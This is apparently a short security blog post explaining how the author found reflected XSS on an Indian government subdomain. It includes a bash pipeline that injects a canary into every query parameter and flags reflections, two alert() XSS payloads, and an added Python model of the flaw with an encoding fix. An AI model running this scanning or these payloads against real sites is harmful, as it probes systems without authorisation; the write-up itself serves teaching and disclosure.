How I found Reflected XSS on *.GOV.IN

Prince Prafull
3 min read · May 2, 2023


This post shows how to find candidate vulnerable parameters in a web application and how to approach a site when testing for vulnerabilities like XSS and SQLi.

What is Reflected XSS:

Reflected cross-site scripting (reflected XSS) is a vulnerability that occurs when an application takes data from an HTTP request and includes it in the immediate response without proper validation or output encoding.

Let's go step by step:

Select the domain: *.gov.in

Step 1: Find all possible subdomains under the selected domain

Step 2: Select any one subdomain

Step 3: Find all possible parameters using a tool like ParamSpider

Step 4: Examine all URLs that directly reflect special characters.

To automate this, use the script below:

# Drop static assets, replace every query value with the canary "><() and
# flag any URL whose response reflects the canary unencoded.
grep -Eiv '\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)' urls.txt \
  | qsreplace '"><()' \
  | tee combinedfuzz.json \
  | while read -r host; do
      curl --silent --path-as-is --insecure "$host" | grep -qs '"><()' \
        && echo -e "$host \033[91m Vulnerable \e[0m \n" \
        || echo -e "$host \033[92m Not Vulnerable \e[0m \n"
    done | tee XSS.txt

The script flags these parameters as Vulnerable:

Step 5: Try it manually now:

Let's try a basic XSS payload:

"><script>alert(1);</script>

Doesn’t work:

Enter Payload

No Pop-Ups:

Let's start from the beginning:

Just try a single quote:

'
No errors.

No input validation or sanitization is present:

Now try with some event handlers:

' onmouseover=alert(1);>

Hover your mouse over the links after entering the payload to have it executed.

Let's see the source code:

We got XSS. Now report it to NCIIPC.
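Added example, not code from the original post or the real site: a small Python model of the attribute context the single-quote probe points to. It reflects the parameter inside a single-quoted href, shows what a parser makes of the two payloads above, and shows what correct output encoding changes. The template and function names are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed template (assumption, not the real site): the parameter is
# reflected inside a single-quoted href attribute of a link.
TEMPLATE = "<a href='/search?q={q}'>Results</a>"

def render_unsafe(q: str) -> str:
    """Reflects the parameter into the attribute with no encoding (the bug)."""
    return TEMPLATE.format(q=q)

def render_safe(q: str) -> str:
    """Encodes &, <, >, double and single quotes so the value stays inside the attribute."""
    return TEMPLATE.format(q=html.escape(q, quote=True))

class _TagCollector(HTMLParser):
    """Records every start tag and its attribute names, as a browser would see them."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.attrs: list = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend((tag, name) for name, _ in attrs)

def tag_names(markup: str) -> list:
    """Element names the parser creates from the response markup."""
    p = _TagCollector()
    p.feed(markup)
    return p.tags

def event_handlers(markup: str) -> list:
    """(tag, attribute) pairs for every on* handler present in the markup."""
    p = _TagCollector()
    p.feed(markup)
    return [(t, a) for t, a in p.attrs if a.startswith("on")]

def reflects_raw(body: str, canary: str = '"><()') -> bool:
    """The step-4 check: is the canary reflected unencoded in the body?"""
    return canary in body
```

In this model the `<script>` payload stays inside the quoted href and creates no element, while `' onmouseover=alert(1);>` closes the attribute and adds a handler to the link; after `html.escape` neither does anything.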

📞Contact:

https://www.linkedin.com/in/prince-prafull-19a477194/


Prince Prafull

Cyber Security Learner | Web Application Testing | Student